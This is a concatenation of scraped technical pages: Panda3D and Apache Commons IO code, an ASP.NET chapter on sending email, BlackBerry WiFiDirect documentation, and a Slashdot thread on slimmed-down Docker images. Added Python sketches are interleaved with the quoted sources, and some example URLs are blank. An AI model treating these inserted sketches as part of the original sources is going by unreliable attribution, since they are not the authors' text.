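        if self.repeat_count in (0, 1):
            target = 1
        elif self.repeat_count > 1:
            target = self.repeat_count
        else:
            target = max_cycles  # "forever", capped for the sketch
        for _ in range(target):
            for task in self.tasks:
                task()
            self.runs += 1

calls = []
seq = SequenceSketch([lambda: calls.append("a"), lambda: calls.append("b")])
seq.set_repeat_count(3)
seq.run()
assert seq.runs == 3 and calls == ["a", "b"] * 3
```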
https://docs.panda3d.org/1.10/python/reference/panda3d.core.AsyncTaskSequence
import java.io.IOException;
import java.io.OutputStream;

/**
 * Closed output stream. This stream throws an exception on all attempts to
 * write something to the stream.
 * <p>
 * Typical uses of this class include testing for corner cases in methods
 * that accept an output stream and acting as a sentinel value instead of
 * a {@code null} output stream.
 *
 * @version $Id: ClosedOutputStream.java 1307459 2012-03-30 15:11:44Z ggregory $
 * @since 1.4
 */
public class ClosedOutputStream extends OutputStream {

    /**
     * A singleton.
     */
    public static final ClosedOutputStream CLOSED_OUTPUT_STREAM = new ClosedOutputStream();

    /**
     * Throws an {@link IOException} to indicate that the stream is closed.
     *
     * @param b ignored
     * @throws IOException always thrown
     */
    @Override
    public void write(int b) throws IOException {
        throw new IOException("write(" + b + ") failed: stream is closed");
    }

}
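The same sentinel idea carries over to other languages. Here is a rough Python analogue (my own sketch, not part of Commons IO) of a closed output stream that rejects every write:

```python
import io

# Python analogue of ClosedOutputStream: claims to be writable so that
# write() is actually reached, then raises on every write attempt.
class ClosedOutputStream(io.RawIOBase):
    def writable(self):
        return True

    def write(self, b):
        raise IOError("write(%r) failed: stream is closed" % (b,))

# Singleton-style sentinel, mirroring CLOSED_OUTPUT_STREAM in the Java class.
CLOSED_OUTPUT_STREAM = ClosedOutputStream()

try:
    CLOSED_OUTPUT_STREAM.write(b"x")
    raised = False
except IOError:
    raised = True
assert raised
```

As in the Java original, the value is useful in tests for methods that accept an output stream, and as a non-None sentinel.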
http://commons.apache.org/io/api-release/src-html/org/apache/commons/io/output/ClosedOutputStream.html#line.33
There are several situations in which you will need to send email messages from your ASP.NET applications. For example, you might want to send a confirmation message to a new user after the user has registered. Or, you might want to automatically send a document to a user as a mail attachment.

The ASP.NET Framework includes two classes for sending email: the SmtpMail class and the MailMessage class. These classes were designed to work with the local Microsoft SMTP Service (included as a component of Windows 2000 and Windows XP Professional) or any other email server on your network.

In the following sections, you'll be provided with an overview of the Microsoft SMTP Service. Next, you'll learn how to send a simple email message with the SMTP Service. Finally, more advanced topics, such as sending email with attachments and sending HTML email, are discussed.

The Microsoft SMTP Service does the basic job of sending and retrieving email in accordance with the Simple Mail Transfer Protocol (SMTP). In some ways it is very limited. The service does not support the Post Office Protocol (POP). This means that you cannot use the service to create mailbox accounts for multiple users or retrieve email from the service using an email client, such as Outlook or Eudora. If you need to create a full-blown email system that goes beyond support for basic SMTP, you will need to invest in additional software, such as Microsoft Exchange Server or Software.com's Post.Office.

On the positive side, the Microsoft SMTP Service is valuable for sending automated messages from your Web site. The service can support sending thousands of email messages a day. For example, you can use it to send automatic notification messages to the users of your Web site.

To check whether the SMTP Service is installed and running on your server, open the Internet Services Manager and see whether an icon labeled Default SMTP Virtual Server is listed beneath the name of your server (see Figure 26.1).
If the service is installed but not running, start the service by selecting Action, Start.

A single computer can have multiple SMTP Virtual Servers. Each SMTP Virtual Server is identified by an IP address and domain name. An SMTP Virtual Server can contain one default local domain and zero or more alias domains. When the SMTP Service is installed, a single default local domain is created. The name of the default local domain determines how the service delivers messages. If the service receives an email message that is addressed to the same domain as the default local domain, it is delivered locally; otherwise, the service attempts to send it somewhere else.

NOTE: The name of the default local domain is determined by the name designated on the DNS tab for the TCP/IP protocol in the Network application in the Control Panel.

You can create multiple SMTP Virtual Servers on the same server. This is useful when you need to host completely different Web sites on the same computer. Each SMTP Virtual Server can handle email sent to different IP addresses or domain names. To create a new SMTP Virtual Server, right-click on the icon labeled Default SMTP Virtual Server and choose New, Virtual Server.

Finally, you can optionally create alias domains for a single SMTP Virtual Server. Alias domains are useful when your Web site has multiple domain names that point to the same site. When an email message is sent to an alias domain, the message is treated as if it were sent to the default local domain. To create an alias domain, right-click on the icon labeled Domains and choose New, Domain. These additional alias domains must all share the same IP address and Drop directory (see the next section, "How the Microsoft SMTP Service Works") as the default local domain.

You can monitor the performance of the SMTP Service by examining its log files. By default, the service keeps a log of its activity in the \WINNT\System32\LogFiles directory.
This directory can be changed by clicking the SMTP Virtual Server's property sheet and editing the entry labeled Log File Directory. You can open and examine the SMTP Service's log files in any standard text editor such as Notepad.

From a user's perspective, the SMTP Service is a simple component. The service uses two main directories, named Pickup and Drop, to process email. Both of these directories are located, by default, under the InetPub\MailRoot directory.

The Pickup directory is used to send email. The service constantly monitors the Pickup directory for new email messages. Whenever it finds an email message, the service attempts to send it. If the service is unable to immediately deliver the message, it is kept in the Queue directory while the service attempts to keep delivering the message. If the email message cannot be delivered and cannot be returned to the sender, the message is moved to the Badmail directory.

The Drop directory is used to receive email. When email messages are received by the SMTP Service, the service writes out the messages to the Drop directory. It doesn't do anything else with them; they just stay there. Again, the Microsoft SMTP Service does not support multiple mailboxes.

The email messages in these two directories are nothing more than text files. For example, you can send an email message by opening Notepad, entering the following text, and saving the file in the Pickup directory (Inetpub\mailroot\pickup):

To: Webmaster@Superexpert.com
From: someone@somewhere.com
Subject: Testing SMTP Service

Here is the message!

As soon as you save the file, the file should disappear from the Pickup directory because the SMTP Service is attempting to send it. In theory, you could use the classes from the System.IO namespace from within your ASP.NET pages to write messages to the Pickup directory and send email (see Chapter 25, "Working with the File System"). In practice, however, this is not a good strategy.
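The Pickup-directory mechanism described above can be sketched in a few lines. This is illustrative only: the real path (Inetpub\mailroot\pickup) exists only on a machine running the Microsoft SMTP Service, so this Python sketch writes the same message format to a temporary directory instead:

```python
import os
import tempfile

# The message is a plain text file: headers, a blank line, then the body.
message = (
    "To: Webmaster@Superexpert.com\n"
    "From: someone@somewhere.com\n"
    "Subject: Testing SMTP Service\n"
    "\n"
    "Here is the message!\n"
)

pickup_dir = tempfile.mkdtemp()  # stand-in for the real Pickup directory
path = os.path.join(pickup_dir, "message.eml")
with open(path, "w") as f:
    f.write(message)

with open(path) as f:
    saved = f.read()
assert saved.startswith("To: Webmaster@Superexpert.com")
```

As the chapter notes, writing files into Pickup directly is not the recommended approach; the SmtpMail and MailMessage classes are more reliable.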
You can send email more reliably and easily by using the SmtpMail and MailMessage classes.

You can use the SmtpMail class to send an email message from within an ASP.NET page with a single line of code. To send an email with the SmtpMail class, use the Send method:

SmtpMail.Send( _
  "jane@somewhere.com", _
  "webmaster@Superexpert.com", _
  "Testing Mail!", _
  "Just sending a test message!" )

This statement sends an email message from jane@somewhere.com to webmaster@Superexpert.com. The subject of the message is Testing Mail! and the body of the message is Just sending a test message!.

Both the SmtpMail and MailMessage classes are found in the System.Web.Mail namespace. Before you can use these classes, you must import the System.Web.Mail namespace into your page.

By default, the SmtpMail class uses the local email server to send email messages. You can use another email server on your network by setting the shared SmtpServer property of the SmtpMail class before sending a message. For example, to use the email server located at MyEmailServer.com, you would use the statement:

SmtpMail.SmtpServer = "MyEmailServer.com"

The ASP.NET page in Listing 26.1 contains a simple form that enables you to send any email message (see Figure 26.2).

<%@ Import Namespace="System.Web.Mail" %>

<Script Runat="Server">

Sub Button_Click( s As Object, e As EventArgs )
  SmtpMail.Send( _
    mailfrom.Text, _
    mailto.Text, _
    mailsubject.Text, _
    mailbody.Text )
End Sub

</Script>

<html>
<head><title>SendMail.aspx</title></head>
<body>

<h1>Send Mail:</h1>

<form runat="Server">

<b>From:</b>
<br>
<asp:TextBox id="mailfrom" Runat="Server" />

<p>
<b>To:</b>
<br>
<asp:TextBox id="mailto" Runat="Server" />

<p>
<b>Subject:</b>
<br>
<asp:TextBox id="mailsubject" Runat="Server" />

<p>
<b>Body:</b>
<br>
<asp:TextBox id="mailbody" Runat="Server" />

<p>
<asp:Button Text="Send!" OnClick="Button_Click" Runat="Server" />

</form>

</body>
</html>

The C# version of this code can be found on the CD-ROM.

When you submit the form in Listing 26.1, the Button_Click subroutine executes. This subroutine grabs all the values entered into the form fields and sends an email message with those values.
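For comparison (this is my own sketch, not part of the book), the same message could be built with Python's standard email package; the server name in the comment is the book's hypothetical MyEmailServer.com:

```python
from email.message import EmailMessage

# Build the equivalent of SmtpMail.Send(from, to, subject, body).
msg = EmailMessage()
msg["From"] = "jane@somewhere.com"
msg["To"] = "webmaster@Superexpert.com"
msg["Subject"] = "Testing Mail!"
msg.set_content("Just sending a test message!")

# Actually sending it would use smtplib against a real server, e.g.:
#   import smtplib
#   with smtplib.SMTP("MyEmailServer.com") as smtp:
#       smtp.send_message(msg)

assert msg["Subject"] == "Testing Mail!"
```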
If you are sending a long message, you will probably need to include line breaks in the message body. By default, an email message does not use HTML, so you cannot use the <BR> or <P> HTML tags to create a line break. To create a line break, use the Visual Basic constant, vbCRLF, which adds a carriage return and line feed.

As shown in the previous section, you can use the Send method of the SmtpMail class to send simple email messages. However, if you need to set particular properties of an email message, then you'll need to create an instance of the MailMessage class. The MailMessage class has the following properties:

- Attachments: Returns a collection representing all the files attached to the message.
- Bcc: Gets or sets the Blind Copy field of the email message.
- Body: Gets or sets the body of the email message.
- BodyEncoding: Gets or sets a value from the MailEncoding enumeration that specifies the method of encoding the message (possible values are Base64 and UUEncode).
- BodyFormat: Gets or sets a value from the MailFormat enumeration that specifies the format of the body of the message (possible values are Text and Html).
- Cc: Gets or sets the carbon copy field of the email message.
- From: Gets or sets the From field of the email message.
- Headers: Returns a collection of headers used by the email message.
- Priority: Gets or sets a value from the MailPriority enumeration that specifies the priority of the message (possible values are High, Low, and Normal).
- Subject: Gets or sets the Subject field of the email message.
- To: Gets or sets the To field of the email message.
- UrlContentBase: Gets or sets the Content Base header of an HTML email message. This property is used with the UrlContentLocation property to resolve relative URLs in the body of a message.
- UrlContentLocation: Gets or sets the Content Location header of an HTML email message. This property can contain an absolute URL or a relative URL.
When UrlContentLocation contains a relative URL, it must be used in conjunction with the UrlContentBase property.

For example, imagine that you need to send a high-priority email message to Jane@yourcompany.com and you want to send a blind carbon copy of the message to your supervisor at supervisor@yourcompany.com. You could send this message with the following statements:

Dim objMailMessage As MailMessage

objMailMessage = New MailMessage
objMailMessage.From = "you@yourcompany.com"
objMailMessage.To = "jane@yourcompany.com"
objMailMessage.Subject = "Meeting location changed!"
objMailMessage.Body = "The meeting will be in the Salmon room"
objMailMessage.Priority = MailPriority.High
objMailMessage.Bcc = "supervisor@yourcompany.com"

SmtpMail.Send( objMailMessage )

First, an instance of the MailMessage class is created and several of its properties are set. Next, the MailMessage is sent with the Send method of the SmtpMail class.

You can attach one or more files to an email message by using the MailAttachment class. The MailAttachment class represents a particular email attachment. This class has the following two properties:

- Filename: The path of a file to attach to the email message.
- Encoding: A value from the MailEncoding enumeration that specifies how the attached file should be encoded (possible values are Base64 and UUEncode).

You can set these properties on an instance of the MailAttachment class. Alternatively, and more conveniently, you can specify the Filename and Encoding parameters when initializing the class through its constructor like this:

objMailAttachment = New MailAttachment( "c:\somefile.zip" )

or

objMailAttachment = New MailAttachment( "c:\somefile.zip", MailEncoding.UUEncode )

The first statement initializes an instance of the MailAttachment class with the path to a file. The second statement initializes an instance of the MailAttachment class with both a path to a file and an encoding format.
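The attachment workflow has a close analogue in Python's standard email package (again my own sketch, not the ASP.NET classes); the bytes below stand in for the contents of c:\somefile.zip:

```python
from email.message import EmailMessage

msg = EmailMessage()
msg["Subject"] = "Secret Business Plan"
msg.set_content("Here's the plan (don't show it to anyone!)")

# Attach some bytes as a named file, playing the role of creating a
# MailAttachment and calling Attachments.Add on the message.
fake_zip_bytes = b"PK\x03\x04 not a real zip"  # placeholder payload
msg.add_attachment(fake_zip_bytes, maintype="application",
                   subtype="zip", filename="somefile.zip")

attachment_names = [part.get_filename() for part in msg.iter_attachments()]
assert attachment_names == ["somefile.zip"]
```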
For example, the ASP.NET page in Listing 26.2 attaches a Microsoft Word document named BizPlan.doc to an email message.

<%@ Import Namespace="System.Web.Mail" %>

<%
Dim objMailMessage As MailMessage
Dim objMailAttachment As MailAttachment

' Create the Mail Attachment
objMailAttachment = New MailAttachment( "c:\BizPlan.doc" )

' Create the Mail Message
objMailMessage = New MailMessage
objMailMessage.From = "you@somewhere.com"
objMailMessage.To = "joe@somewhere.com"
objMailMessage.Subject = "Secret Business Plan"
objMailMessage.Body = "Here's the plan (don't show it to anyone!)"
objMailMessage.Attachments.Add( objMailAttachment )

' Send the Mail Message
SmtpMail.Send( objMailMessage )
%>

BizPlan Sent!

When you execute the ASP.NET page in Listing 26.2, the BizPlan.doc file is emailed to joe@somewhere.com.

By default, the SmtpMail class sends email messages as plain text. However, you also have the option to send the body of an email as HTML. If you send an email as an HTML message, then you can include HTML formatting and images in the body of the message.

CAUTION: Not all email clients support HTML email messages. Even worse, some email clients support some HTML tags and not others.

To send an HTML email, set the BodyFormat property of the MailMessage class like this:

objMailMessage.BodyFormat = MailFormat.Html

The page in Listing 26.3 illustrates how to send an HTML email.

<%@ Import Namespace="System.Web.Mail" %>

<%
Dim objMailMessage As MailMessage
Dim strHTMLBody As String

' Create the HTML Message Body
strHTMLBody = "<html><head>" & _
  "<title>Thank You!</title>" & _
  "</head><body bgcolor=lightblue>" & _
  "<font face=Script size=6>" & _
  "Thank you for registering!" & _
  "</font></body></html>"

' Create the Mail Message
objMailMessage = New MailMessage
objMailMessage.From = "you@somewhere.com"
objMailMessage.To = "joe@somewhere.com"
objMailMessage.Subject = "Thanks for Registering!"
objMailMessage.Body = strHTMLBody
objMailMessage.BodyFormat = MailFormat.HTML

' Send the Mail Message
SmtpMail.Send( objMailMessage )
%>

HTML Email Sent!

When you request the ASP.NET page in Listing 26.3, an email message containing a light blue background and a script type face is sent (see Figure 26.3).

Writing text with HTML formatting can be messy. Listing 26.3 created a string variable named strHTMLBody that contained the entire HTML for the body of the message. There is a better way to work with HTML in the ASP.NET Framework. You can manipulate HTML with the HtmlTextWriter. To learn more about the HtmlTextWriter, see Chapter 28, "Developing Custom Controls."

The page in Listing 26.4 illustrates how you can use the HtmlTextWriter to more cleanly build the body of an HTML email message:

twTextWriter.AddAttribute( "face", "Script" )
twTextWriter.AddAttribute( "size", "6" )
twTextWriter.RenderBeginTag( "font" )
twTextWriter.WriteLine( "Thank you for registering!" )
...
objMailMessage.Subject = "Thanks for Registering!"
objMailMessage.Body = swHtmlBody.ToString
objMailMessage.BodyFormat = MailFormat.HTML

' Send the Mail Message
SmtpMail.Send( objMailMessage )
%>

HTML Email Sent!

When including images or links in an HTML email, you must specify the link as an absolute path; otherwise, the email client won't have enough information to find the proper Web site. In other words, you must use an address like this:

rather than the shorter relative address:

/somedir/thepage.aspx

You can get around this limitation by using the UrlContentBase and UrlContentLocation properties of the MailMessage class. If you assign an absolute URL to the UrlContentLocation property, then all URLs in the body of the message are interpreted relative to that URL.
For example, if you assign a value to the UrlContentLocation property like this:

objMailMessage.UrlContentLocation = ""

then you can use the following IMG tag in the body of the email message:

<img src="aspnet.gif">

The path of the image specified in the IMG tag would be resolved to:

If you assign a relative URL to the UrlContentLocation property, then you must also assign a value to the UrlContentBase property. The combined values of the UrlContentLocation and UrlContentBase properties would be used to construct an absolute URL.

The page in Listing 26.5 demonstrates how you can send an image and resolve the location of the image with the UrlContentLocation property:

twTextWriter.AddAttribute( "src", "aspnet.gif" )
twTextWriter.RenderBeginTag( "img" )
...
objMailMessage.Subject = "Here's the image!"
objMailMessage.Body = swHTMLBody.ToString
objMailMessage.BodyFormat = MailFormat.HTML
objMailMessage.UrlContentLocation = ""

' Send the Mail Message
SmtpMail.Send( objMailMessage )
%>

Image Sent!

In Listing 26.5, an image named aspnet.gif is included in the body of the email message. Because the UrlContentLocation property is set, the absolute path to the image on the origin Web site can be resolved.
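The HTML message in Listing 26.3 also has a standard-library analogue in Python (my own sketch, not the ASP.NET classes); here the plain-text part plays the role of a fallback for clients that cannot render HTML:

```python
from email.message import EmailMessage

msg = EmailMessage()
msg["Subject"] = "Thanks for Registering!"
msg.set_content("Thank you for registering!")  # text/plain fallback
msg.add_alternative(
    "<html><body bgcolor=lightblue>"
    "<font face=Script size=6>Thank you for registering!</font>"
    "</body></html>",
    subtype="html",
)

# The message is now multipart/alternative: clients pick the richest
# part they can display, which helps with the clients that have only
# partial HTML support mentioned in the CAUTION earlier.
assert msg.get_content_type() == "multipart/alternative"
```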
https://flylib.com/books/en/3.443.1.167/1/
WiFiDirectConnectionState

Since: BlackBerry 10.2.0

#include <bb/device/WiFiDirectConnectionState>

To link against this class, add the following line to your .pro file:

LIBS += -lbbdevice

The state of the WiFiDirect connection to the network group.

Public Types

The state of the WiFiDirect connection to the network group. Since: BlackBerry 10.2.0

- Unknown = 0: Unable to determine the current network group state.
- Connecting = 1: A connection to the network group is currently in progress. Since: BlackBerry 10.2.0
- Connected = 2: Currently connected to a network group. Since: BlackBerry 10.2.0
- Disconnected = 3: Not currently connected to a network group. Since: BlackBerry 10.2.0
https://developer.blackberry.com/native/reference/cascades/bb__device__wifidirectconnectionstate.html
New Hack Shrinks Docker Containers

destinyland writes: Promising "uber tiny Docker images for all the things," Iron.io has released a new library of base images for every major language, optimized to be as small as possible by using only the required OS libraries and language dependencies. "By streamlining the cruft that is attached to the node images and installing only the essentials, they reduced the image from 644 MB to 29 MB," explains one technology reporter, noting this makes it quicker to download and distribute the image, and also more secure. "Less code/less programs in the container means less attack surface..." writes Travis Reeder, the co-founder of Iron.io, in a post on the company's blog. "Most people who start using Docker will use Docker's official repositories for their language of choice, but unfortunately if you use them, you'll end up with images the size of the Empire State Building..."

WTF? (Score:3, Insightful)

Re: (Score:3, Insightful)

Im not a developer, but i think its like install shield for windows. Creates application packages or something. Still the summary should really give a brief definition.

Re:WTF? (Score:5, Insightful)

Re: (Score:1, Insightful)

Not everyone who reads /. is a software developer, a *nix sysadmin, or whatever other area of specialization would use that. When you read a headline and you don't recognize the terminology used in the headline, you have two choices: you can skip the story completely, as it's probably not relevant to what you do; or you can click through the provided links to read more. Making a joke by pretending to misunderstand what the terminology means is a distant third choice. I wish there was a -1, Not Funny moderation.

Re: (Score:1)

If it takes 644 Mb for a "Hello World" program, then that is probably why I have never heard of it. Seriously.

Re: (Score:2)

I see it's true. Aspies really can't recognize sarcasm.
Indeed, it is true that while the Egyptian Cobra can recognize moving objects and sources of heat, it really can't recognize sarcasm. I didn't think people still called them Asps or Aspis, though.

Re: (Score:2)

Online sarcasm was deprecated in 1986, there was a posting on all Major BBS based systems about it. Kids these days just can't follow the Best Practices.

Re: (Score:2)

And some of us are software developers, don't consume advertising or "hype" other than places like this. I only clicked on this to find out if it was something interesting, or just the next big blahblah. Judging from the lack of interest displayed even in the "everybody who is anybody heard of it already" responses suggests to me that it is fluff. Anyways, I'm not going to take a long enough break from writing firmware to both look up some unrelated thing, and also talk about it on slashdot.

Re: (Score:2)

Use LXC, LXD, or systemd-nspawn

Oh no you didn't!

Re: (Score:2)

But, my comment was really in relation to the piss poor submission, and the failure of

Re: (Score:3)

Even if you know Docker, fewer people actually think about the implications size has on cloud compute systems. For example Amazon EC2 Container Registry (ECR) gives 500 MB for the free tier and it's relatively cheap to store large container images. Most cloud services store these local registries in their network, so you don't incur bandwidth charges from external registries. Also it should start faster and is likely more reliable, but those are just bonuses. It's true that a small image will start faster, but

Re: (Score:1)

Then they went commercial (everybody needs to buy groceries). Then they were bought out, with the provision that the founders stay on. Eventually they moved on, then mergers and another sale to, shall we say, a purely capitalist owner. Acro

Re: (Score:2)

Esoteric doesn't mean what you think it means.
It does not mean unusual or rare, it means "intended for or likely to be understood by only a small number of people with a specialized knowledge or interest." Which it is.

/. has a wide audience. I'm interested in learning about technologies outside of my bailiwick (which centers on networking). I can usually get an understanding from context in

I'm not a developer, and only play a sysadmin at home.

Re: (Score:2)

But this one was just pure technobabble for anyone outside of very specific fields.

Indeed, not all developers run their code "in somebody's cloud," some of us generally expect hardware to be provisioned to run our software. Not saying that the cloud doesn't have its place, but it is rather odd to see people getting snooty over it when "websites running in public clouds" is sortof fry-cook level development. If something I'm working on has a cloud component, that doesn't mean I would want to be deploying it. Most of the people on the development team wouldn't need to know about the cloud-wh

Re: (Score:2)

Re: (Score:1)

It is more like thinstall/thinapp. Everything you need to run the binary is in the package

That sounds like a ROM image for a stand alone embedded microcomputer. Have we really gone full circle? There was a reason that we quit doing that! 8-)

Re: (Score:2)

Right, but this is rewritable. OTOH, so are/were the ROMs... Actually, I have to get back to some firmware programming for a microcontroller, but don't worry: I won't be using the EEPROM, only the flash.

Re: (Score:1)

Re: (Score:2)

Re: (Score:2)

They are talking about taking a container which is commonly used for implementing the 'cloud' buzzword and using it to implement the 'IoT' buzzword. Someone pointed out that 'things' generally are a lot more resource constrained than servers, so they've slimmed down their 644 MB container to 29 MB. Good luck fitting that into the 128 kB of flash in the typical microcontroller running your consumer electronics.
It's best not to mix everything together in your head until it all becomes the same thing. Containers are great for servers. Even if you ran a container on an embedded device, it would need to run Linux. That's probably not happening on the microcontroller you describe. More importantly there's almost 0 incentive to run Docker on an embedded device simply because there's very few applications which require that kind of isolation on an embedded device. About the only device I've seen with a justified reason to use

Re: (Score:2)

What are they talking about, and why do I care about the size of the container Levi's ships my Docker khakis in? I find it scary that this post above was actually mod'ed insightful. Slashdot, wtf happened to you?

Re: (Score:1)

What are they talking about, and why do I care about the size of the container Levi's ships my Docker khakis in? I find it scary that this post above was actually mod'ed insightful. Slashdot, wtf happened to you?

We got tired of "SalesPersons" writing the stories! 8-) to pine for my golden days of yesteryear, those are mine. Get your own, order them now and you can have them in a couple decades when you forget what it was really like.

LOL. Da'fuk? I have a submission on 2011, so obviously is not yesterday. Plus I had another account that goes back to 1998. But whatever, a post is worth by its content, not by the longevity of the account (and the fact that you use the latter speaks more about you than about me.)

Re: (Score:2)

Right, oh, 2011 isn't yesterday? What, were you born yesterday? No, you didn't have another account, if you did you would use it. If you had been here since the 90s, you would know that. Perhaps your reputation was so awful, you decided to pretend you were born yesterday? No, that isn't any improvement. Or even a believable story. A post is only "worth by its content" in some language I don't speak.
On slashdot, a comment has to make sense to have value, and if it doesn't have value and is written by somebod

Re: Wha? (Score:1)

It's a small thermal exhaust port, right below the main port.

Re: (Score:3)

That should be the new vulnerability metric. Womp rats. "A new vulnerability was found in the D-Star app this week, rating at 3.8 womp rats. CEO Tarkin downplayed the severity of the vulnerability and promised the D-Star app will continue to enhance system stability without interference from any rogue squadrons of hackers."

Re: (Score:3)

?... [youtube.com]

Re: (Score:2)

>> Isn't the attack surface governed by the ports you open up on the Docker containers?

I believe they are talking about the ease with which someone could slip malware into a large container image vs. a small container image and have it go undetected.

In practice yes, though not in principle (Score:2)

Although you describe a common case, it's not the general one. In principle the size of a software attack surface is given by the amount of code which is reachable through an attack conduit like a network, not by the "width" of the conduit. For example, a given network service could be bound to just one IP address or to two, but its attack surface would remain the same despite double the size of the attack conduit. Likewise

the point (Score:2)

Re: (Score:3)

As a developer, I though the entire point of Docker was to reduce dependence on an entire layer of IT: the human gatekeepers in charge of the release systems and procedures and eventually the care and feeding of maintenance systems (who often f*** something up with manual fumbling or delay things with meetings involving coffee-swilling waterbags). At least that's how I've seen Docker used in corporations so far, anyway.

Re: (Score:2)

Re: (Score:2)

I thought what he said was that the development team is being held hostage by IT, who convinced somebody they were "the computer guys" so they should be in charge of "all the technical computery stuff."
Re: (Score:2) As a developer, I though the entire point of Docker was to reduce dependence on an entire layer of IT: the human gatekeepers Finally somebody explained both what it is for, and why I haven't heard of it... I'm not suffering under a BOFH! They should have just said in the summary, "Docker, a BOFH-resistant deployment system." Re:the point (Score:5, Informative) The point of Docker is to have a single package ("container") that contains all of its dependencies, running in isolation from any other Docker containers. Since the container is self-contained, it can be run on any Docker host. For example, if you have some wacky old program that only runs on one particular set of library versions, it might be hard for you to get the Docker container just right to make it run; but once you do, that container will Just Work everywhere, and updating packages on the host won't break it. The point of the news story is that someone did a better job of stripping the container down, removing libraries and such that were not true dependencies (weren't truly needed). Not only does this make for smaller containers, but it should reduce the attack surface, by removing resources that are available inside the container. For example, if someone finds a security flaw in library libfoo, this would protect against that security flaw by removing libfoo when it is not needed. It's pretty hard for an exploit to call code in a library if the library isn't present. Also, presumably all development tools and even things like command-line shells would be stripped out. Thus a successful attacker might gain control over a docker container instance, but would have no way to escalate privileges any further. If the stated numbers are correct (a 644 MB container went down to 29 MB) yet the new small package still works, then clearly there is a lot of unnecessary stuff in that standard 644 MB container. 
Re: (Score:2) If "shrinking to a minimum" is really the goal, then they should take a good look at the kernel itself. It has collected lots of cruft over the past 20+ years. The first Linux "distribution" I booted (Linux kernel 0.12) came on two 1.2MB floppy disks that still had room to hold additional files. A lot has changed since then, but if you claim 'bare essentials' then there's plenty room for improvement. Re: (Score:3) Docker containers don't contain a kernel. They use the host OS for services. Re: (Score:3) The problem with your logic (aside from being irrelevant in the case of Docker since it doesn't include a kernel) is that a lot of the "cruft" has been added as a base requirement to make a bootable modern system, and in many cases to improve performance. You can strip everything back to 20 years ago, but will you be able to run your harddrives in PIO mode 2 all for the sake of making the kernel smaller by not needing UDMA support? Okay contrived example, but that's what I'm talking about. You want a small k Re: (Score:2) God told to run only in 640x480 with 16 colors and get rid of memory protection. USB isn't necessary in any way either. Re: (Score:2) The only thing really unnecessary is obeying an imaginary friend. Re: (Score:2) What I've been wondering is ... isn't that a bitch to maintain security patches? Because you now have all these potentially vulnerable libraries spread out over a bunch of docker containers, completely outside of the control of the package manager. So when the next heartbleed bug comes around, you may think you have patched your system, while in fact the libraries you are exposing to the outside world via your docker apps are still vulnerable. Re: (Score:2) Right, instead of updating the OS packages when a major security 0-day arrives, you need to turn off all your app containers, forward to a parking page, and start recompiling images. 
But, your dev teams don't have to agree on compatible sets of libraries to use on projects that will be deployed together on the same cloud instances. This trades the ability to deal with those types of problems, for being able to do stuff you couldn't do because your company didn't have anybody that can do that stuff. So without Re: (Score:2) It's actually kind of an inversion. Docker base images for Debian [docker.com], CentOS [docker.com], and Ubuntu [docker.com] are typically 50-100 megabytes. Shrinking down that "base image" doesn't really make sense; Iron.io instead shrunk down images for things like PHP, Node, and Ruby. Even then, you have two main issues. Firstly, if you have something stupid like e.g. PHP not coming with ANYTHING installed (no php-pdo, no php-ldap, etc.), you have to write your own Dockerfile to install PHP. Typically, you can just put "image: php/5.6-fpm Re: (Score:1) While the iron.io folks do manage to squeeze the size down, they do so through the use of Alpine Linux which uses musl libs rather than glibc and friends. There is a post on hackernews... [ycombinator.com] that has a discussion about the pros and cons of using an alpine based image. There is also the deviation from upstream. The official images are a curated set of images and can be maintained by anyone willing to put in the time. For the official images that are not maintained by the upstrea Re: (Score:2) ...that container will Just Work everywhere, and updating packages on the host won't break it. I love this stuff... updating packages on the host won't break "it," even where "it" is some sort of malware bug. It doesn't seem to so much solve a problem as offer a new way to create a compromise between security and convenience. Here, it mostly trades the convenience of security updates at the OS level away for convenience of deploying minimally-maintained packages. If I wanted this, I would just switch to static linking. 
But I can see how, for development teams that don't have anybody on them that knows Re: (Score:3) Wasn't a common library the entire point of Docker? Packaging the libs with the app, etc, to reduce dependence on the host OS? No, although it's one of Docker's features. Docker images are actually stacked layers of filesystem sub-images operating as overlays, so a typical Docker image might consist of a base OS image, several library images built by the Docker build process, culminating in the actual application image. Done judiciously, those sub-images can be shared by multiple application images, thereby saving space in the Docker image store. But Docker is a lot more than that. You can run virtual networks within containers, sha Re: (Score:2) Will it make using Docker any easier on OSX? Why o why does it need to install an Ubuntu VM guest and run Docker inside that?? It's worse than that. It's Docker on Ubuntu on OSX on Turtles all the way down. Re: (Score:2) Re:Because Docker uses a Linux container (Score:2)? Re: (Score:1) FreeBSD got jails some years ago for the same purpose, and IIRC that was one of the inspirations for the linux version. (Both inspired by containers in Solaris, and earlier iterations of the idea in other OSes). Not that that matters on the MacOS side; the OS X kernel is a weird hybrid thing with a BSD kernel hanging off a Mach microkernel. The BSD parts aren't exactly a full and current FreeBSD, either; IIRC they grabbed a subset they found useful a bunch of years ago. At a guess the jail support didn't mak Re: (Score:1) "FreeBSD got jails some years ago for the same purpose, and IIRC that was one of the inspirations for the linux version. (Both inspired by containers in Solaris, and earlier iterations of the idea in other OSes)." Actually, I believe Jails were first. 
In order: 1- UNIX chroot 2- FreeBSD jails 3- Solaris Zones 4- Linux Containers Re: (Score:2) So at this rate, Hurd which is also "hanging off a Mach microkernel" is more likely to have native Docker supporter before OS X. :) Re: (Score:2) FreeBSD Jails and Linux Containers are really different beasts. Jails are great if security is your primary consideration. Hence the name: Jails effectively isolate processes and go to great lengths to prevent them from accessing anything outside the jail. Containers use separate kernel namespaces to give groups of processes separate views of kernel global variables. Security (especially with user namespaces) is a bonus, but the primary goal is efficient os-level virtualization and isolation of resources. A Re: (Score:2) You can run Docker on FreeBSD [freebsd.org] thanks to the 64-bit Linux compatibility layer that was added last year. Re: (Score:2) Yeah, except that FreeBSD has had 'jails' for over a decade, which are far more secure than anything Docker brings to bear. Linux has had jails for over a decade. I image that FreeBSD actually goes back further than that. Docker has jails plus virtual networks plus various other isolation mechanisms, so I cannot credit your assertion that a jail-only mechanism is more secure. Re: (Score:1) "Linux has had jails for over a decade. I image that FreeBSD actually goes back further than that." Yep, jails appeared in FreeBSD 4.0-RELEASE around 1999-2000 if I recall correctly. "Docker has jails plus virtual networks plus various other isolation mechanisms, so I cannot credit your assertion that a jail-only mechanism is more secure." To be fair, FreeBSD also has virtual networks so each jail can also run a complete virtualized network. As for a comparison in security, I'm unable to make an informed commen Re: (Score:2) Because it makes heavy use of features inside the Linux kernel which isolate applications from the rest of the operating system. 
